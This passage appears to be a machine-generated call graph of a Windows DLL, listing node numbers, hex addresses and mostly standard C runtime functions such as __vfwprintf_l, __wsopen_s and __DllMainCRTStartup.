15024->15025 15025->15024 15036 6beec37b 15026->15036 15028 6bee8ab6 15030 6beede7c __vfwprintf_l 29 API calls 15028->15030 15035 6bee8ad1 __vfwprintf_l 15030->15035 15031 6bee8de8 15033 6beec2ee __DllMainCRTStartup@12 39 API calls 15031->15033 15032 6bee8ae9 15032->15031 15043 6beec2ee 15032->15043 15033->15035 15035->14948 15037 6bee8aa1 15036->15037 15038 6beec380 15036->15038 15037->15028 15037->15032 15037->15035 15039 6bef0431 __dosmaperr 14 API calls 15038->15039 15040 6beec385 15039->15040 15049 6beedef9 15040->15049 15044 6beec318 15043->15044 15045 6beec303 15043->15045 15044->15031 15045->15044 15046 6bef0431 __dosmaperr 14 API calls 15045->15046 15047 6beec30d 15046->15047 15048 6beedef9 __wsopen_s 39 API calls 15047->15048 15048->15044 15050 6beede45 __wsopen_s 39 API calls 15049->15050 15052 6beebddc 15051->15052 15115 6bee86ab 15052->15115 15054 6beebe1e __vfwprintf_l 15126 6bef0f60 15054->15126 15057 6beec320 __vfwprintf_l 39 API calls 15058 6beebed4 __vfwprintf_l 15057->15058 15059 6beec320 __vfwprintf_l 39 API calls 15058->15059 15060 6beebf10 __vfwprintf_l 15058->15060 15059->15060 15060->14987 15060->15060 15062 6beec024 __DllMainCRTStartup@12 15061->15062 15063 6beec040 15062->15063 15064 6beec320 __vfwprintf_l 39 API calls 15062->15064 15066 6beec061 15062->15066 15065 6bef124b __wsopen_s 40 API calls 15063->15065 15064->15063 15065->15066 15066->14987 15068 6bee985c __vfwprintf_l 15067->15068 15069 6bee987e 15068->15069 15071 6bee98a5 15068->15071 15070 6beede7c __vfwprintf_l 29 API calls 15069->15070 15073 6bee989b __DllMainCRTStartup@12 15070->15073 15071->15073 15197 6bee872c 15071->15197 15073->14987 15077 6beec0b5 __vfwprintf_l 15074->15077 15075 6beede7c __vfwprintf_l 29 API calls 15076 6beec0d6 15075->15076 15076->14987 15077->15075 15077->15076 15079 6bee953d __vfwprintf_l 15078->15079 15080 6bee955f 15079->15080 15082 6bee9586 15079->15082 15081 6beede7c __vfwprintf_l 29 API calls 15080->15081 15084 6bee957c __DllMainCRTStartup@12 15081->15084 15083 6bee872c __DllMainCRTStartup@12 15 API calls 15082->15083 15082->15084 15083->15084 15084->14987 15086 6beec14d 15085->15086 15208 6bee9209 15086->15208 15088 6beec15d 15088->14987 15090 6beec219 __DllMainCRTStartup@12 15089->15090 15091 6beec237 __vfwprintf_l 15090->15091 15215 6beec270 15090->15215 15091->14987 15094 6bee9847 __DllMainCRTStartup@12 30 API calls 15093->15094 15095 6beec189 15094->15095 15095->14987 15219 6bee8197 15096->15219 15104 6bef125f 15103->15104 15111 6bef126f 15103->15111 15105 6bef1294 15104->15105 15106 6beec320 __vfwprintf_l 39 API calls 15104->15106 15104->15111 15107 6bef12c8 15105->15107 15108 6bef12a5 15105->15108 15106->15105 15110 6bef1344 15107->15110 15107->15111 15113 6bef12f0 15107->15113 15263 6bef77fc 15108->15263 15112 6bef488b __fread_nolock MultiByteToWideChar 15110->15112 15111->14989 15112->15111 15113->15111 15266 6bef488b 15113->15266 15116 6bee86d2 15115->15116 15125 6bee86c0 15115->15125 15116->15125 15145 6bef047e 15116->15145 15119 6bee86fe 15121 6bef0444 __freea 14 API calls 15119->15121 15120 6bee8709 15152 6beea149 15120->15152 15121->15125 15124 6bef0444 __freea 14 API calls 15124->15125 15125->15054 15127 6bef0f95 15126->15127 15129 6bef0f71 15126->15129 15127->15129 15130 6bef0fc8 __vfwprintf_l 15127->15130 15128 6beede7c __vfwprintf_l 29 API calls 15142 6beebeb1 15128->15142 15129->15128 15131 6bef1030 15130->15131 15133 6bef1001 15130->15133 15132 6bef1059 15131->15132 15134 6bef105e 15131->15134 15135 6bef1086 15132->15135 15136 6bef10c0 15132->15136 15155 6bef0e04 15133->15155 15163 6bef068d 15134->15163 15139 6bef108b 15135->15139 15140 6bef10a6 15135->15140 15190 6bef09ba 15136->15190 15173 6bef0d35 15139->15173 15183 6bef0bb1 15140->15183 15142->15057 15142->15058 15146 6bef04bc 15145->15146 15150 6bef048c _unexpected 15145->15150 15147 6bef0431 __dosmaperr 14 API calls 15146->15147 15149 6bee86f6 15147->15149 15148 6bef04a7 RtlAllocateHeap 15148->15149 15148->15150 15149->15119 15149->15120 15150->15146 15150->15148 15151 6beedf8f _unexpected RtlEnterCriticalSection RtlLeaveCriticalSection 15150->15151 15151->15150 15153 6bef0444 __freea 14 API calls 15152->15153 15154 6bee8714 15153->15154 15154->15124 15156 6bef0e1a 15155->15156 15157 6bef0e25 15155->15157 15156->15142 15158 6beeed88 ___std_exception_copy 39 API calls 15157->15158 15159 6bef0e80 15158->15159 15160 6bef0e8a 15159->15160 15161 6beedf26 __vfwprintf_l 11 API calls 15159->15161 15160->15142 15162 6bef0e98 15161->15162 15164 6bef06a0 15163->15164 15165 6bef06af 15164->15165 15166 6bef06d1 15164->15166 15167 6beede7c __vfwprintf_l 29 API calls 15165->15167 15168 6bef06e6 15166->15168 15170 6bef0739 15166->15170 15172 6bef06c7 __fread_nolock __vfwprintf_l __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem _strrchr 15167->15172 15169 6bef09ba __vfwprintf_l 41 API calls 15168->15169 15169->15172 15171 6beec320 __vfwprintf_l 39 API calls 15170->15171 15170->15172 15171->15172 15172->15142 15174 6bef612b __vfwprintf_l 41 API calls 15173->15174 15175 6bef0d65 15174->15175 15176 6bef5b81 __vfwprintf_l 29 API calls 15175->15176 15177 6bef0da3 15176->15177 15178 6bef0daa 15177->15178 15179 6bef0de3 15177->15179 15181 6bef0dbc 15177->15181 15178->15142 15180 6bef0a5e __vfwprintf_l 39 API calls 15179->15180 15180->15178 15182 6bef0c47 __vfwprintf_l 39 API calls 15181->15182 15182->15178 15184 6bef612b __vfwprintf_l 41 API calls 15183->15184 15185 6bef0be0 15184->15185 15186 6bef5b81 __vfwprintf_l 29 API calls 15185->15186 15187 6bef0c21 15186->15187 15188 6bef0c28 15187->15188 15189 6bef0c47 __vfwprintf_l 39 API calls 15187->15189 15188->15142 15189->15188 15191 6bef612b __vfwprintf_l 41 API calls 15190->15191 15192 6bef09e4 15191->15192 15193 6bef5b81 __vfwprintf_l 29 API calls 15192->15193 15194 6bef0a32 15193->15194 15195 6bef0a39 15194->15195 15196 6bef0a5e __vfwprintf_l 39 API calls 15194->15196 15195->15142 15196->15195 15198 6bee8753 15197->15198 15199 6bee8741 15197->15199 15198->15199 15200 6bef047e __fread_nolock 15 API calls 15198->15200 15199->15073 15201 6bee8778 15200->15201 15202 6bee878b 15201->15202 15203 6bee8780 15201->15203 15205 6beea149 __vfwprintf_l 14 API calls 15202->15205 15204 6bef0444 __freea 14 API calls 15203->15204 15204->15199 15206 6bee8796 15205->15206 15207 6bef0444 __freea 14 API calls 15206->15207 15207->15199 15209 6bee921e __vfwprintf_l 15208->15209 15210 6bee9240 15209->15210 15212 6bee9267 15209->15212 15211 6beede7c __vfwprintf_l 29 API calls 15210->15211 15214 6bee925d __DllMainCRTStartup@12 15211->15214 15213 6bee872c __DllMainCRTStartup@12 15 API calls 15212->15213 15212->15214 15213->15214 15214->15088 15216 6beec283 15215->15216 15218 6beec28a __vfwprintf_l 15215->15218 15217 6beec320 __vfwprintf_l 39 API calls 15216->15217 15217->15218 15218->15091 15220 6bee81aa 15219->15220 15221 6bee81a1 15219->15221 15226 6bef04f9 15220->15226 15222 6bee8151 __vfwprintf_l 16 API calls 15221->15222 15223 6bee81a6 15222->15223 15223->15220 15234 6beeed44 15223->15234 15227 6beec34d 15226->15227 15228 6bef0510 15226->15228 15230 6bef0557 15227->15230 15228->15227 15245 6bef5611 15228->15245 15231 6bef056e 15230->15231 15232 6beec35a 15230->15232 15231->15232 15258 6bef455a 15231->15258 15232->14989 15235 6bef4c7b __InternalCxxFrameHandler RtlEnterCriticalSection RtlLeaveCriticalSection 15234->15235 15236 6beeed49 15235->15236 15237 6beeed54 15236->15237 15238 6bef4cc0 __InternalCxxFrameHandler 38 API calls 15236->15238 15239 6beeed5e IsProcessorFeaturePresent 15237->15239 15240 6beeed7d 15237->15240 15238->15237 15241 6beeed6a 15239->15241 15242 6beee4c9 __InternalCxxFrameHandler 21 API calls 15240->15242 15243 6beedcfd __InternalCxxFrameHandler 8 API calls 15241->15243 15244 6beeed87 15242->15244 15243->15240 15246 6bef561d __FrameHandler3::FrameUnwindToState 15245->15246 15247 6beef497 _unexpected 39 API calls 15246->15247 15248 6bef5626 15247->15248 15249 6bef566c 15248->15249 15250 6bef351f __InternalCxxFrameHandler RtlEnterCriticalSection 15248->15250 15249->15227 15251 6bef5644 15250->15251 15252 6bef5692 __vfwprintf_l 14 API calls 15251->15252 15253 6bef5655 15252->15253 15254 6bef5671 __vfwprintf_l RtlLeaveCriticalSection 15253->15254 15255 6bef5668 15254->15255 15255->15249 15256 6beeed44 __FrameHandler3::FrameUnwindToState 39 API calls 15255->15256 15257 6bef5691 15256->15257 15259 6beef497 _unexpected 39 API calls 15258->15259 15260 6bef455f 15259->15260 15261 6bef4472 __vfwprintf_l 39 API calls 15260->15261 15262 6bef456a 15261->15262 15262->15232 15269 6bef98ef 15263->15269 15273 6bef47f3 15266->15273 15271 6bef991d __vfwprintf_l 15269->15271 15270 6bee4ad5 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 15272 6bef7817 15270->15272 15271->15270 15272->15111 15274 6bef4804 MultiByteToWideChar 15273->15274 15274->15111 15276 6bee110e __vfwprintf_l 15275->15276 15279 6beec72b 15276->15279 15280 6beec73f __vfwprintf_l 15279->15280 15285 6bee8541 15280->15285 15283 6bee7d4e __vfwprintf_l 39 API calls 15284 6bee1118 15283->15284 15284->14349 15286 6bee854d 15285->15286 15287 6bee8570 15285->15287 15288 6beede7c __vfwprintf_l 29 API calls 15286->15288 15292 6bee8597 15287->15292 15293 6bee824a 15287->15293 15289 6bee8568 15288->15289 15289->15283 15290 6beede7c __vfwprintf_l 29 API calls 15290->15289 15292->15289 15292->15290 15294 6bee8276 15293->15294 15296 6bee8299 15293->15296 15295 6beede7c __vfwprintf_l 29 API calls 15294->15295 15297 6bee828e 15295->15297 15296->15294 15298 6bee82a1 __vfwprintf_l 15296->15298 15299 6bee4ad5 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 15297->15299 15304 6beea71b 15298->15304 15300 6bee83bc 15299->15300 15300->15292 15303 6beea12f __vfwprintf_l 14 API calls 15303->15297 15305 6beec3ce __DllMainCRTStartup@12 29 API calls 15304->15305 15313 6beea735 __vfwprintf_l __DllMainCRTStartup@12 15305->15313 15306 6bee8322 15306->15303 15307 6beede7c __vfwprintf_l 29 API calls 15307->15306 15308 6beea740 15308->15307 15311 6beec320 __vfwprintf_l 39 API calls 15311->15313 15313->15306 15313->15308 15313->15311 15314 6beea844 15313->15314 15318 6beea379 15313->15318 15321 6beead98 15313->15321 15355 6beeb3bd 15313->15355 15315 6beede7c __vfwprintf_l 29 API calls 15314->15315 15316 6beea85e 15315->15316 15317 6beede7c __vfwprintf_l 29 API calls 15316->15317 15317->15306 15384 6bee887c 15318->15384 15320 6beea3b4 15320->15313 15322 6beead9f 15321->15322 15323 6beeadb6 15321->15323 15324 6beeb442 15322->15324 15325 6beeb3e2 15322->15325 15332 6beeadf5 15322->15332 15326 6beede7c __vfwprintf_l 29 API calls 15323->15326 15323->15332 15330 6beeb47b 15324->15330 15331 6beeb447 15324->15331 15327 6beeb468 15325->15327 15328 6beeb3e8 15325->15328 15329 6beeadea 15326->15329 15421 6bee939b 15327->15421 15342 6beeb3ed 15328->15342 15343 6beeb439 15328->15343 15329->15313 15333 6beeb498 15330->15333 15334 6beeb480 15330->15334 15335 6beeb449 15331->15335 15336 6beeb474 15331->15336 15332->15313 15432 6beec15e 15333->15432 15334->15327 15334->15343 15353 6beeb413 __vfwprintf_l __DllMainCRTStartup@12 15334->15353 15338 6beeb3fc 15335->15338 15346 6beeb458 15335->15346 15428 6beec124 15336->15428 15354 6beeb4a1 __DllMainCRTStartup@12 15338->15354 15400 6beebc2a 15338->15400 15342->15338 15344 6beeb426 15342->15344 15342->15353 15343->15354 15414 6bee96ba 15343->15414 15344->15354 15410 6beebf62 15344->15410 15346->15327 15348 6beeb45c 15346->15348 15350 6beec09f __vfwprintf_l 29 API calls 15348->15350 15348->15354 15349 6bee4ad5 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 15351 6beeb71a 15349->15351 15350->15353 15351->15313 15353->15354 15435 6bef10e1 15353->15435 15354->15349 15356 6beeb442 15355->15356 15357 6beeb3e2 15355->15357 15360 6beeb47b 15356->15360 15361 6beeb447 15356->15361 15358 6beeb468 15357->15358 15359 6beeb3e8 15357->15359 15367 6bee939b __vfwprintf_l 30 API calls 15358->15367 15371 6beeb3ed 15359->15371 15372 6beeb439 15359->15372 15362 6beeb498 15360->15362 15363 6beeb480 15360->15363 15364 6beeb449 15361->15364 15365 6beeb474 15361->15365 15366 6beec15e __vfwprintf_l 30 API calls 15362->15366 15363->15358 15363->15372 15381 6beeb413 __vfwprintf_l __DllMainCRTStartup@12 15363->15381 15369 6beeb3fc 15364->15369 15374 6beeb458 15364->15374 15368 6beec124 __vfwprintf_l 30 API calls 15365->15368 15366->15381 15367->15381 15368->15381 15370 6beebc2a __vfwprintf_l 42 API calls 15369->15370 15383 6beeb4a1 __DllMainCRTStartup@12 15369->15383 15370->15381 15371->15369 15373 6beeb426 15371->15373 15371->15381 15375 6bee96ba __vfwprintf_l 30 API calls 15372->15375 15372->15383 15377 6beebf62 __vfwprintf_l 41 API calls 15373->15377 15373->15383 15374->15358 15376 6beeb45c 15374->15376 15375->15381 15379 6beec09f __vfwprintf_l 29 API calls 15376->15379 15376->15383 15377->15381 15378 6bee4ad5 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 15380 6beeb71a 15378->15380 15379->15381 15380->15313 15382 6bef10e1 __vfwprintf_l 41 API calls 15381->15382 15381->15383 15382->15381 15383->15378 15385 6beec37b __vfwprintf_l 39 API calls 15384->15385 15386 6bee888e 15385->15386 15387 6bee88a3 15386->15387 15390 6bee88d6 15386->15390 15393 6bee88be __vfwprintf_l 15386->15393 15388 6beede7c __vfwprintf_l 29 API calls 15387->15388 15388->15393 15389 6bee896d 15391 6beec2c5 __vfwprintf_l 39 API calls 15389->15391 15390->15389 15394 6beec2c5 15390->15394 15391->15393 15393->15320 15395 6beec2ea 15394->15395 15396 6beec2d6 15394->15396 15395->15389 15396->15395 15397 6bef0431 __dosmaperr 14 API calls 15396->15397 15398 6beec2df 15397->15398 15399 6beedef9 __wsopen_s 39 API calls 15398->15399 15399->15395 15401 6beebc44 15400->15401 15402 6bee86ab __vfwprintf_l 15 API calls 15401->15402 15403 6beebc83 __vfwprintf_l 15402->15403 15404 6bef0f60 __vfwprintf_l 41 API calls 15403->15404 15406 6beebd16 15404->15406 15405 6beebd3a __vfwprintf_l 15408 6beec320 __vfwprintf_l 39 API calls 15405->15408 15409 6beebd6d __vfwprintf_l 15405->15409 15406->15405 15407 6beec320 __vfwprintf_l 39 API calls 15406->15407 15407->15405 15408->15409 15409->15353 15412 6beebf7d __vfwprintf_l 15410->15412 15411 6beebfb3 15411->15353 15412->15411 15413 6bef10e1 __vfwprintf_l 41 API calls 15412->15413 15413->15411 15415 6bee96cf __vfwprintf_l 15414->15415 15416 6bee96f1 15415->15416 15418 6bee9718 15415->15418 15417 6beede7c __vfwprintf_l 29 API calls 15416->15417 15420 6bee970e __vfwprintf_l 15417->15420 15419 6bee86ab __vfwprintf_l 15 API calls 15418->15419 15418->15420 15419->15420 15420->15353 15422 6bee93b0 __vfwprintf_l 15421->15422 15423 6bee93d2 15422->15423 15425 6bee93f9 15422->15425 15424 6beede7c __vfwprintf_l 29 API calls 15423->15424 15427 6bee93ef __vfwprintf_l 15424->15427 15426 6bee86ab __vfwprintf_l 15 API calls 15425->15426 15425->15427 15426->15427 15427->15353 15429 6beec130 15428->15429 15445 6bee907c 15429->15445 15431 6beec140 15431->15353 15433 6bee96ba __vfwprintf_l 30 API calls 15432->15433 15434 6beec173 15433->15434 15434->15353 15437 6bef10f6 15435->15437 15436 6bef1137 15443 6bef10fa __fread_nolock __vfwprintf_l 15436->15443 15444 6bef1123 __fread_nolock 15436->15444 15452 6bef4945 15436->15452 15437->15436 15438 6beec320 __vfwprintf_l 39 API calls 15437->15438 15437->15443 15437->15444 15438->15436 15439 6beede7c __vfwprintf_l 29 API calls 15439->15443 15441 6bef11f2 15442 6bef1208 GetLastError 15441->15442 15441->15443 15442->15443 15442->15444 15443->15353 15444->15439 15444->15443 15446 6bee9091 __vfwprintf_l 15445->15446 15447 6bee90b3 15446->15447 15449 6bee90da 15446->15449 15448 6beede7c __vfwprintf_l 29 API calls 15447->15448 15451 6bee90d0 __vfwprintf_l 15448->15451 15450 6bee86ab __vfwprintf_l 15 API calls 15449->15450 15449->15451 15450->15451 15451->15431 15453 6bef4958 __vfwprintf_l 15452->15453 15454 6bef4996 WideCharToMultiByte 15453->15454 15454->15441 15466 6bee3c50 15455->15466 15459 6bee38df __DllMainCRTStartup@12 15465 6bee3905 __DllMainCRTStartup@12 15459->15465 15473 6bee3c2b 15459->15473 15463 6bee4ad5 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 15464 6bee33db 15463->15464 15464->14360 15465->15463 15467 6bee3c6b __DllMainCRTStartup@12 15466->15467 15468 6bee4ad5 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 15467->15468 15469 6bee38d5 15468->15469 15469->15459 15470 6bee142c 15469->15470 15481 6bee48b3 15470->15481 15474 6bee3c50 __DllMainCRTStartup@12 5 API calls 15473->15474 15475 6bee3c3a 15474->15475 15510 6bee3d08 15475->15510 15478 6bee3f56 15514 6bee40a1 15478->15514 15486 6bee4801 15481->15486 15485 6bee48d2 15492 6bee47b1 15486->15492 15489 6bee6486 15490 6bee64cd RaiseException 15489->15490 15491 6bee64a0 15489->15491 15490->15485 15491->15490 15495 6bee5b7e 15492->15495 15496 6bee5b8b ___std_exception_copy 15495->15496 15500 6bee47dd 15495->15500 15499 6bee5bb8 15496->15499 15496->15500 15501 6beeed88 15496->15501 15498 6beed5ab ___vcrt_freefls@4 14 API calls 15498->15500 15499->15498 15500->15489 15502 6beeed96 15501->15502 15503 6beeeda4 15501->15503 15502->15503 15508 6beeedbc 15502->15508 15504 6bef0431 __dosmaperr 14 API calls 15503->15504 15505 6beeedac 15504->15505 15506 6beedef9 __wsopen_s 39 API calls 15505->15506 15507 6beeedb6 15506->15507 15507->15499 15508->15507 15509 6bef0431 __dosmaperr 14 API calls 15508->15509 15509->15505 15511 6bee3d29 __DllMainCRTStartup@12 15510->15511 15512 6bee4ad5 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 15511->15512 15513 6bee3966 15512->15513 15513->15478 15517 6bee40b3 15514->15517 15522 6bee40fa 15517->15522 15523 6bee40c2 15522->15523 15524 6bee4113 15522->15524 15526 6bee40ce 15523->15526 15532 6bee1339 15524->15532 15527 6bee40da 15526->15527 15528 6bee40e5 15526->15528 15536 6bee411f 15527->15536 15530 6bee3f70 15528->15530 15544 6bee139b 15528->15544 15530->15465 15533 6bee1347 __DllMainCRTStartup@12 15532->15533 15534 6bee6486 std::_Xinvalid_argument RaiseException 15533->15534 15535 6bee1355 15534->15535 15535->15523 15537 6bee413b 15536->15537 15538 6bee4136 15536->15538 15540 6bee139b __DllMainCRTStartup@12 3 API calls 15537->15540 15539 6bee1339 __DllMainCRTStartup@12 RaiseException 15538->15539 15539->15537 15542 6bee4143 15540->15542 15543 6bee415c 15542->15543 15547 6beedf09 15542->15547 15543->15530 15558 6bee4ae8 15544->15558 15552 6beede45 15547->15552 15550 6beedf26 __vfwprintf_l 11 API calls 15551 6beedf25 15550->15551 15553 6beede57 __vfwprintf_l 15552->15553 15554 6beede7c __vfwprintf_l 29 API calls 15553->15554 15555 6beede6f 15554->15555 15556 6bee7d4e __vfwprintf_l 39 API calls 15555->15556 15557 6beede7a 15556->15557 15557->15550 15559 6bee4aed ___std_exception_copy 15558->15559 15560 6bee13a6 15559->15560 15561 6beedf8f _unexpected 2 API calls 15559->15561 15563 6bee4b09 __DllMainCRTStartup@12 15559->15563 15560->15530 15561->15559 15562 6bee501f __DllMainCRTStartup@12 15564 6bee6486 std::_Xinvalid_argument RaiseException 15562->15564 15563->15562 15566 6bee6486 std::_Xinvalid_argument RaiseException 15563->15566 15565 6bee503c 15564->15565 15566->15562 15568 6bee3ccb __DllMainCRTStartup@12 15567->15568 15571 6bee3d6a 15568->15571 15570 6bee3ce2 15570->14418 15576 6bee3f02 15571->15576 15575 6bee3db1 __DllMainCRTStartup@12 15575->15570 15577 6bee3d7e 15576->15577 15578 6bee3f14 15576->15578 15577->15575 15580 6bee3f85 15577->15580 15593 6bee3f1d 15578->15593 15581 6bee3c50 __DllMainCRTStartup@12 5 API calls 15580->15581 15582 6bee3faf 15581->15582 15583 6bee3fbc 15582->15583 15585 6bee142c __DllMainCRTStartup@12 40 API calls 15582->15585 15584 6bee3c2b __DllMainCRTStartup@12 5 API calls 15583->15584 15586 6bee3fd9 __DllMainCRTStartup@12 15584->15586 15585->15583 15587 6bee3f56 __DllMainCRTStartup@12 40 API calls 15586->15587 15588 6bee3ff3 __DllMainCRTStartup@12 15587->15588 15589 6bee405b __DllMainCRTStartup@12 15588->15589 15604 6bee377a 15588->15604 15591 6bee4ad5 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 15589->15591 15592 6bee409d 15591->15592 15592->15575 15596 6bee48d3 15593->15596 15601 6bee4856 15596->15601 15599 6bee6486 std::_Xinvalid_argument RaiseException 15600 6bee48f2 15599->15600 15602 6bee47b1 std::exception::exception 39 API calls 15601->15602 15603 6bee4868 15602->15603 15603->15599 15607 6bee3839 15604->15607 15610 6bee3bd2 15607->15610 15609 6bee37ac 15609->15589 15611 6bee3c0a __DllMainCRTStartup@12 15610->15611 15612 6bee3bfd 15610->15612 15611->15609 15614 6bee13a9 15612->15614 15615 6bee13e5 15614->15615 15616 6beedf09 __DllMainCRTStartup@12 39 API calls 15615->15616 15617 6bee1400 15615->15617 15616->15615 15617->15611 15620 6bee34e1 __DllMainCRTStartup@12 15618->15620 15619 6bee3525 __DllMainCRTStartup@12 15619->14420 15620->15619 15621 6bee377a __DllMainCRTStartup@12 39 API calls 15620->15621 15621->15619 15623 6bee32aa __DllMainCRTStartup@12 15622->15623 15626 6bee359b 15623->15626 15625 6bee32be 15625->14360 15627 6bee35f4 15626->15627 15629 6bee35af __DllMainCRTStartup@12 15626->15629 15630 6bee3ae0 15627->15630 15629->15625 15631 6bee3c50 __DllMainCRTStartup@12 5 API calls 15630->15631 15633 6bee3afb 15631->15633 15632 6bee3b05 15635 6bee3c2b __DllMainCRTStartup@12 5 API calls 15632->15635 15633->15632 15634 6bee142c __DllMainCRTStartup@12 40 API calls 15633->15634 15634->15632 15636 6bee3b19 __DllMainCRTStartup@12 15635->15636 15637 6bee3f56 __DllMainCRTStartup@12 40 API calls 15636->15637 15638 6bee3b33 __DllMainCRTStartup@12 15637->15638 15639 6bee377a __DllMainCRTStartup@12 39 API calls 15638->15639 15640 6bee3b80 __DllMainCRTStartup@12 15638->15640 15639->15640 15641 6bee4ad5 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 15640->15641 15642 6bee3ba8 15641->15642 15642->15629 15644 6bee10df __vfwprintf_l 15643->15644 15681 6bee10a2 15644->15681 15648 6bee3421 __DllMainCRTStartup@12 15647->15648 15891 6bee39e9 15648->15891 15651 6bee23ce 15652 6bee23f4 __DllMainCRTStartup@12 15651->15652 15653 6bee240b ExpandEnvironmentStringsW 15652->15653 15654 6bee329b __DllMainCRTStartup@12 40 API calls 15653->15654 15655 6bee2421 15654->15655 15656 6bee4ad5 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 15655->15656 15657 6bee242e 15656->15657 15658 6bee1654 VariantInit 15657->15658 15658->14442 15659->14446 15660->14450 15661->14453 15662->14456 15663->14458 15682 6bee10b6 __vfwprintf_l 15681->15682 15685 6beec687 15682->15685 15686 6beec69b __vfwprintf_l 15685->15686 15687 6beec6bd 15686->15687 15689 6beec6e4 15686->15689 15688 6beede7c __vfwprintf_l 29 API calls 15687->15688 15690 6beec6d8 15688->15690 15694 6bee81ef 15689->15694 15692 6bee7d4e __vfwprintf_l 39 API calls 15690->15692 15693 6bee10c0 15692->15693 15693->14440 15695 6bee81fb __FrameHandler3::FrameUnwindToState 15694->15695 15702 6beecc7d RtlEnterCriticalSection 15695->15702 15697 6bee8209 15703 6beea16d 15697->15703 15702->15697 15717 6bef13fe 15703->15717 15705 6beea194 __vfwprintf_l 15724 6beea46b 15705->15724 15708 6beea12f __vfwprintf_l 14 API calls 15709 6beea1e8 15708->15709 15739 6bef14a9 15709->15739 15743 6bef13c0 15717->15743 15719 6bef140f __vfwprintf_l 15720 6bef1471 15719->15720 15721 6bef047e __fread_nolock 15 API calls 15719->15721 15720->15705 15722 6bef1468 15721->15722 15723 6bef0444 __freea 14 API calls 15722->15723 15723->15720 15766 6beec396 15724->15766 15727 6beea491 15729 6beede7c __vfwprintf_l 29 API calls 15727->15729 15728 6beea1db 15728->15708 15729->15728 15732 6beec320 __vfwprintf_l 39 API calls 15734 6beea4b9 __vfwprintf_l 15732->15734 15733 6beea379 __vfwprintf_l 39 API calls 15733->15734 15734->15728 15734->15732 15734->15733 15735 6beea6ad 15734->15735 15772 6beeac3f 15734->15772 15806 6beeb07b 15734->15806 15736 6beede7c __vfwprintf_l 29 API calls 15735->15736 15737 6beea6c7 15736->15737 15738 6beede7c __vfwprintf_l 29 API calls 15737->15738 15738->15728 15740 6beea1f5 15739->15740 15741 6bef14b4 15739->15741 15741->15740 15744 6bef13cc __vfwprintf_l 15743->15744 15745 6bef13f6 15744->15745 15750 6beeeea2 15744->15750 15745->15719 15747 6bef13e7 15757 6bef5a73 15747->15757 15749 6bef13ed 15749->15719 15751 6beeeeae 15750->15751 15752 6beeeec3 15750->15752 15753 6bef0431 __dosmaperr 14 API calls 15751->15753 15752->15747 15754 6beeeeb3 15753->15754 15755 6beedef9 __wsopen_s 39 API calls 15754->15755 15756 6beeeebe 15755->15756 15756->15747 15758 6bef5a80 15757->15758 15760 6bef5a8d 15757->15760 15759 6bef0431 __dosmaperr 14 API calls 15758->15759 15762 6bef5a85 15759->15762 15761 6bef0431 __dosmaperr 14 API calls 15760->15761 15763 6bef5a99 15760->15763 15764 6bef5aba 15761->15764 15762->15749 15763->15749 15765 6beedef9 __wsopen_s 39 API calls 15764->15765 15765->15762 15767 6beec3c3 15766->15767 15768 6beec3a1 15766->15768 15835 6beec3ff 15767->15835 15769 6beede7c __vfwprintf_l 29 API calls 15768->15769 15771 6beea486 15769->15771 15771->15727 15771->15728 15771->15734 15773 6beeac5d 15772->15773 15774 6beeac46 15772->15774 15777 6beede7c __vfwprintf_l 29 API calls 15773->15777 15783 6beeac9c 15773->15783 15775 6beeb09f 15774->15775 15776 6beeb10b 15774->15776 15774->15783 15778 6beeb0a5 15775->15778 15779 6beeb133 15775->15779 15781 6beeb14a 15776->15781 15782 6beeb110 15776->15782 15780 6beeac91 15777->15780 15793 6beeb0aa 15778->15793 15794 6beeb100 15778->15794 15789 6bee939b __vfwprintf_l 30 API calls 15779->15789 15780->15734 15784 6beeb14f 15781->15784 15785 6beeb169 15781->15785 15786 6beeb112 15782->15786 15787 6beeb141 15782->15787 15783->15734 15784->15779 15784->15794 15807 6beeb09f 15806->15807 15808 6beeb10b 15806->15808 15809 6beeb0a5 15807->15809 15810 6beeb133 15807->15810 15811 6beeb14a 15808->15811 15812 6beeb110 15808->15812 15821 6beeb0aa 15809->15821 15822 6beeb100 15809->15822 15819 6bee939b __vfwprintf_l 30 API calls 15810->15819 15813 6beeb14f 15811->15813 15814 6beeb169 15811->15814 15815 6beeb112 15812->15815 15816 6beeb141 15812->15816 15813->15810 15813->15822 15832 6beeb0d2 __vfwprintf_l 15813->15832 15818 6beec15e __vfwprintf_l 30 API calls 15814->15818 15817 6beeb0b9 15815->15817 15825 6beeb121 15815->15825 15820 6beec124 __vfwprintf_l 30 API calls 15816->15820 15818->15832 15819->15832 15820->15832 15821->15817 15824 6beeb0e5 15821->15824 15821->15832 15825->15810 15836 6beec413 15835->15836 15842 6beec47d 15835->15842 15837 6beeeea2 __fread_nolock 39 API calls 15836->15837 15838 6beec41a 15837->15838 15839 6bef0431 __dosmaperr 14 API calls 15838->15839 15838->15842 15840 6beec472 15839->15840 15841 6beedef9 __wsopen_s 39 API calls 15840->15841 15841->15842 15842->15771 15892 6bee3c50 __DllMainCRTStartup@12 5 API calls 15891->15892 15893 6bee3a0a 15892->15893 15894 6bee142c __DllMainCRTStartup@12 40 API calls 15893->15894 15895 6bee3a14 __DllMainCRTStartup@12 15893->15895 15894->15895 15896 6bee3c2b __DllMainCRTStartup@12 5 API calls 15895->15896 15899 6bee3a3a __DllMainCRTStartup@12 15895->15899 15897 6bee3a7c 15896->15897 15898 6bee3f56 __DllMainCRTStartup@12 40 API calls 15897->15898 15898->15899 15900 6bee4ad5 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 15899->15900 15901 6bee2500 15900->15901 15901->15651 15922 6beecd68 15921->15922 15923 6beecd79 15921->15923 15925 6bef0431 __dosmaperr 14 API calls 15922->15925 15964 6beecca5 15923->15964 15926 6beecd6d 